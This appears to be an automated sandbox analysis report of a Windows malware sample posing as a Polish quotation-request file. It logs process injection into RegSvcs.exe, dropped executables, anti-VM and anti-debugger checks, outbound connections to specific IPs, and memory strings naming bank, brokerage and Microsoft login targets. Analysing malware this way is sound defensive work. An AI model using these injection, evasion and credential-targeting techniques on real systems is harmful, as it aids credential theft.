                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593745
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593639
                    Source: C:\Windows\System\explorer.exeWindow / User API: threadDelayed 1471Jump to behavior
                    Source: C:\Windows\System\explorer.exeWindow / User API: threadDelayed 714Jump to behavior
                    Source: C:\Windows\System\explorer.exeWindow / User API: foregroundWindowGot 1495Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8106
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1710
                    Source: C:\Windows\System\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\mrsys.exeJump to dropped file
                    Source: C:\Windows\System\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\stsys.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeAPI coverage: 3.2 %
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe API coverage: 3.3 %
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe TID: 6176Thread sleep count: 301 > 30Jump to behavior
                    Source: C:\Windows\System\explorer.exe TID: 6568Thread sleep count: 1471 > 30Jump to behavior
                    Source: C:\Windows\System\explorer.exe TID: 6568Thread sleep count: 714 > 30Jump to behavior
                    Source: C:\Windows\System\svchost.exe TID: 6596Thread sleep count: 280 > 30Jump to behavior
                    Source: C:\Windows\System\svchost.exe TID: 6596Thread sleep count: 49 > 30Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00452126
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,1_2_0045C999
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,1_2_00436ADE
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00434BEE
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0045DD7C FindFirstFileW,FindClose,1_2_0045DD7C
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,1_2_0044BD29
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,1_2_00436D2D
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00442E1F
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00475FE5
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_0044BF8D
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_0040E470
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599421
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599308
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599117
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598962
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598748
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596245
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595919
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593745
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593639
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2057021025.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                    Source: explorer.exe, 00000004.00000003.2556013660.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: RegSvcs.exe, 0000000A.00000002.4484122452.00000000010A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2057021025.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\!!zS
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05869548 LdrInitializeThunk,10_2_05869548
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0045A259 BlockInput,1_2_0045A259
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,1_2_0040D6D0
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0040EB70 LoadLibraryA,GetProcAddress,1_2_0040EB70
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_03EE1170 mov eax, dword ptr fs:[00000030h]1_2_03EE1170
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_03EE1110 mov eax, dword ptr fs:[00000030h]1_2_03EE1110
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_03EDFAC0 mov eax, dword ptr fs:[00000030h]1_2_03EDFAC0
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_00426DA1
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0042202E SetUnhandledExceptionFilter,1_2_0042202E
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004230F5
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00417D93
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00421FA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\System\explorer.exeNetwork Connect: 108.177.15.82 80Jump to behavior
                    Source: C:\Windows\System\explorer.exeNetwork Connect: 51.81.194.202 443Jump to behavior
                    Source: C:\Windows\System\explorer.exeNetwork Connect: 142.251.168.82 80Jump to behavior
                    Source: C:\Windows\System\explorer.exeNetwork Connect: 64.233.166.82 80Jump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C56008Jump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0043916A LogonUserW,1_2_0043916A
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,1_2_0040D6D0
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_004375B0
